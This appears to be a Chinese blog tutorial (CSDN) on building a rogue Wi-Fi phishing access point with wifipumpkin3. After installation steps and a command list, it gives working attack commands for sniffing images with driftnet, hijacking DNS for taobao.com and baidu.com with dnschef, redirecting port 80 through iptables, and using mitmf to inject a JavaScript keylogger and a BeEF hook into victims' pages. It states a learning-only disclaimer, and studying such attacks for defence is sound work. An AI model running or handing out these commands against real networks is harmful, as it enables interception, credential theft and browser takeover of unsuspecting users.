wifipumpkin3无线钓鱼实验指导

本文介绍了如何使用wifipumpkin3进行无线钓鱼攻击,包括安装步骤、核心命令、工具如driftnet和dnschef的应用,以及常见问题解决方案。通过实例演示了图片嗅探、DNS劫持和Web流量操控的技术细节。
摘要由CSDN通过智能技术生成

wifipumpkin3无线钓鱼

声明(必看!必看!)

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。

安装

wifipumpkin3使用Python 3编写,您的机器上需要有一个可以工作的 Python(3.7 版或更高版本)。

注意

  • 不支持Windows 。

  • 不支持Mac OS X。只有docker版本,但没有经过测试。

要求

您需要有一个支持接入点 (AP) 模式的 Wi-Fi 适配器。

工具(预装)

  • iptables(当前:iptables v1.6.1)

  • iw(当前:iw 版本 4.14)

  • 网络工具(当前:版本(1.60+)

  • 无线工具(当前:版本 30~pre9-12)

  • hostapd(当前:hostapd v2.6)

操作系统(推荐)

OSVersion
Ubuntu18.04 LTS bionic
DockerUbuntu 18.04.4 LTS bionic

在Kali Linux上安装 

安装os依赖和下载wifipumpkin3包

 $ sudo apt install libssl-dev libffi-dev build-essential
 $ git clone https://github.com/P0cL4bs/wifipumpkin3.git
 $ cd wifipumpkin3

安装PyQt5

sudo apt install python3-pyqt5

检查pyqt5是否安装成功:

python3 -c "from PyQt5.QtCore import QSettings; print('done')"

如果回显done说明安装成功

编译安装wifipumpkin3

 $ sudo python3 setup.py install

如果您在下面看到此消息,则一切正常!

Finished processing dependencies for wifipumpkin3==1.0.0

启动wifipumpkin3

在终端输入

wifipumpkin3

显示wp3

 

核心命令

help

将列出所有可用的命令

clients

使用高级 UI 显示接入点上连接的所有客户端

ap

显示设置 AP 的所有变量和状态。您可以看到 ( bssid, ssid, channel, security, 或status ap)

set

设置变量代理、插件和接入点,这个命令集就像 metasploitset命令。

unset

未设置变量命令 hostapd_config

start

启动接入点 (AP),如果没有问题,将会看到一个带有 hostapd 程序的新 AP。代理,插件也应该被初始化。

stop

停止在后台运行的访问点、进程、线程、插件和代理。

ignore

消息记录器将被忽略,参数可以是 ( captiveflask, pumpkinproxy, pydns_server sniffkin3)。如果您键入此命令,则不再看到登录控制台 WP。

restore

消息记录器将被恢复,正如你在上面看到的,这个命令是相反的,ignore具有相同的参数将恢复控制台日志。

info

从代理/插件获取信息,此命令显示代理/插件的一些信息,例如(日志路径,配置路径,描述)

jobs

在后台显示所有线程/进程。有时您需要查找 WP 创建的进程的进程 ID 或线程名称。

mode

显示所有可用的无线模式。

plugins

显示所有可用的插件及其状态。

proxies

显示所有可用的代理及其状态。

show

显示可用的模块。

search

按名称搜索模块,这将在未来 milion od modules 😎 可用时实现

use

为模块选择模块,在 metasploit 模块中充满灵感。

dump

从连接在 AP 上的客户端转储信息。

dhcpconf

显示/选择 dhcp 服务器配置

dhcpmode

显示/设置所有可用的 dhcp 服务器。

创建一个wifi

设置无线网卡
set interface wlan0
设置无线网信号(ATI按自己需求更改,就是创建出来的wifi名称)
set ssid ATI
设置插件
set proxy noproxy
开启dns转发
ignore pydns_server
开始攻击 
start

 

用户连接无线后可以看到访问记录,http的可以显示提交内容等

 

攻击手法

图片嗅探

工具:driftnet

过程:

driftnet -i wlan0

然后程序会打开一个小窗口显示所有传输的图片:

注:这里一直说图片太小无法处理,而且抓不到全部图片,有研究这个的大佬可不可以指导指导。

单击图片保存到/

当然可以开启 Adjunct mode:

driftnet -i wlan0 -a

直接保存图片并显示文件名。

 

劫持DNS

工具:dnschef

过程:

dnschef -i 10.0.0.1 --nameserver 114.114.114.114

上述命令是以ip10.0.0.1(上文中的伪造ap网关和DNS的ip)建立dns,对于所有请求转发到114.114.114.114进行解析。显然这只是个"代理"并没有劫持的功效

于是我们进一步添加劫持:

dnschef --fakedomains=taobao.com,baidu.com --fakeip=10.0.0.1 -i 10.0.0.1 --nameserver 114.114.114.114

把淘宝和百度解析到本机。

注:根据自己的dns服务器更改--nameserver后的地址,默认为8.8.8.8

详细内容可以参考http://t.csdn.cn/8awXJ

劫持Web流量

工具:BEEF;mitmf;iptables

过程:

先把80端口的流量劫持走(这里10000是mitmf默认监听端口)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

然后打开mitmf

mitmf -i wlan0 --replace --search-str asd  --replace-str bnm
#把所有网页中的asd替换成bnm
mitmf -i waln0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger

mitmf在这里注入了js键盘记录器和beef的攻击测试脚本,由于本人精力有限其余的攻击方式(比如javapwn)可以自己研究。

最后用BEEF测试用户浏览器

/usr/share/beef-xss/beef

浏览器打开http://127.0.0.1:3000/ui/panel ,初始用户名和密码都是beef

beef详细钓鱼手法大家网上手动查一下,就不在此处详细描述了。

踩坑总结

报错 the interface not found or is unavailable

interface 指定网卡错误 或者未插入此网卡 ifconfig查看自己无线网卡名称

插入无线网卡后重新执行start(不重新set参数会默认执行上次设定的参数)

成功创建名称为ATI的无线

无线无法获取到地址

dhcp配置错误

ease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
range 10.0.0.10 10.0.0.100;
}

将上面的代码添加到 /etc/dhcp/dhcpd.conf

重新启动dhcp服务

dhcpd -cf /etc/dhcp/dhcpd.conf

连接无线无法上网

echo 1 > /proc/sys/net/ipv4/ip_forward
#开启ip转发
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
#对eth0进行snat
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
#把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356
#修改最大报文段长度

互相交流

欢迎各位大佬指出不足,互相交流安全知识,共同守护网络安全!

  • 5
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值